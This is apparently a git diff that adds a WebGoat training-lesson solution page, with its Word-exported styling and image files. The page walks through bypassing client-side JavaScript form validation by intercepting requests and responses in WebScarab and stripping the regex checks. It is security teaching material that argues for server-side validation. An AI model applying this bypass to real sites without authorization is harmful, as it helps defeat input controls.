+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Bypass Client Side JavaScript Validation <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Client-side validation
+should not be considered a secure means of validating parameters. This
+validation only helps reducing the amount of server processing time for normal
+users who do not know the format of required input. Attackers can bypass these
+mechanisms easily in various ways. Any client-side validation should be
+duplicated on the server side. This will greatly reduce the likelihood of
+insecure parameter values being used in the application. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For this
+exercise, the web site requires that you follow certain rules when you fill out
+a form. The user should be able to break those rules, and send the website
+input that it wasn't expecting.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
+ o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
+ stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_176" o:spid="_x0000_i1035" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image002.jpg" v:shapes="Picture_x0020_176"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 6<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There are two
+ways to complete this lesson. The first one is to submit a valid request like
+the one from the screenshot above and intercept this using WebScarab. The
+second way is to intercept the HTTP Response when loading the page and remove
+the Javascript that validates the values.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution 1<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:
+normal'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></i></b></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_177"
+ o:spid="_x0000_i1034" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image004.jpg" v:shapes="Picture_x0020_177"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercept request<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Add different
+symbols to the fields and click “Accept changes”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_178"
+ o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image006.jpg" v:shapes="Picture_x0020_178"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Change parameters<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_179"
+ o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image008.jpg" v:shapes="Picture_x0020_179"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>4</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 6 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution 2<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:
+normal'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></i></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Reload the
+page by clicking on the menu item “How to bypass Client-Side Javascript
+Validation” and intercept the response in WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><!--[if gte vml 1]><v:oval
+ id="_x0000_s1026" style='position:absolute;margin-left:236.55pt;margin-top:7.55pt;
+ width:82.65pt;height:27pt;z-index:1' filled="f" strokecolor="red"/><![endif]--><![if !vml]><span
+style='mso-ignore:vglayout;position:absolute;z-index:1;margin-left:314px;
+margin-top:9px;width:113px;height:38px'><img width=113 height=38
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image009.gif" v:shapes="_x0000_s1026"></span><![endif]><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_180" o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;
+ height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image010.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image011.jpg" v:shapes="Picture_x0020_180"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Enable “Intercept responses”<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_181"
+ o:spid="_x0000_i1030" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image012.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image013.jpg" v:shapes="Picture_x0020_181"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercepted response<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you remove
+the onclick=’validate();’ the “Submit” button will not work anymore.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Locate the
+validate() Javascript function in the HTML page.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_182"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image014.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image015.jpg" v:shapes="Picture_x0020_182"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>7</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> The function validate()</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Removing the regular
+expressions will remove the Javascript validation and submit the form.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_183"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image016.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image017.jpg" v:shapes="Picture_x0020_183"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>8</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Changed validate() function<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click “Accept
+changes”. This returns a HTML page like before but without any regular
+expression checks.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_184"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image018.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image019.jpg" v:shapes="Picture_x0020_184"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>9</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> It looks the same<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change the
+fields in the HTML page to contain symbols like @#@@# and click “Submit”. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_185"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image020.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image021.jpg" v:shapes="Picture_x0020_185"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>10</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> No more regular expression checks<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_186"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image022.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image023.jpg" v:shapes="Picture_x0020_186"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>11</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 6 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<span style='font-size:12.0pt;font-family:"Times New Roman","serif";mso-fareast-font-family:
+"Times New Roman";mso-ansi-language:EN-US;mso-fareast-language:EN-US;
+mso-bidi-language:AR-SA'><br clear=all style='mso-special-character:line-break;
+page-break-before:always'>
+</span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/filelist.xml b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/filelist.xml
new file mode 100644
index 000000000..aa9eb0b16
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/filelist.xml
@@ -0,0 +1,29 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../JavaScriptValidation.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image009.gif"/>
+ <o:File HRef="image010.png"/>
+ <o:File HRef="image011.jpg"/>
+ <o:File HRef="image012.png"/>
+ <o:File HRef="image013.jpg"/>
+ <o:File HRef="image014.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="image016.png"/>
+ <o:File HRef="image017.jpg"/>
+ <o:File HRef="image018.png"/>
+ <o:File HRef="image019.jpg"/>
+ <o:File HRef="image020.png"/>
+ <o:File HRef="image021.jpg"/>
+ <o:File HRef="image022.png"/>
+ <o:File HRef="image023.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image001.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image001.png
new file mode 100644
index 000000000..bb24a6c8f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image002.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image002.jpg
new file mode 100644
index 000000000..ac600b733
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image003.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image003.png
new file mode 100644
index 000000000..20f3f3871
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image004.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image004.jpg
new file mode 100644
index 000000000..0ffa3bfe7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image005.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image005.png
new file mode 100644
index 000000000..a189bb3d8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image006.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image006.jpg
new file mode 100644
index 000000000..2e361f07f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image007.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image007.png
new file mode 100644
index 000000000..2e74b5ec7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image008.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image008.jpg
new file mode 100644
index 000000000..34cf88ebb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image009.gif b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image009.gif
new file mode 100644
index 000000000..1779f251e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image009.gif differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image010.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image010.png
new file mode 100644
index 000000000..88661381a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image010.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image011.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image011.jpg
new file mode 100644
index 000000000..ab68d0731
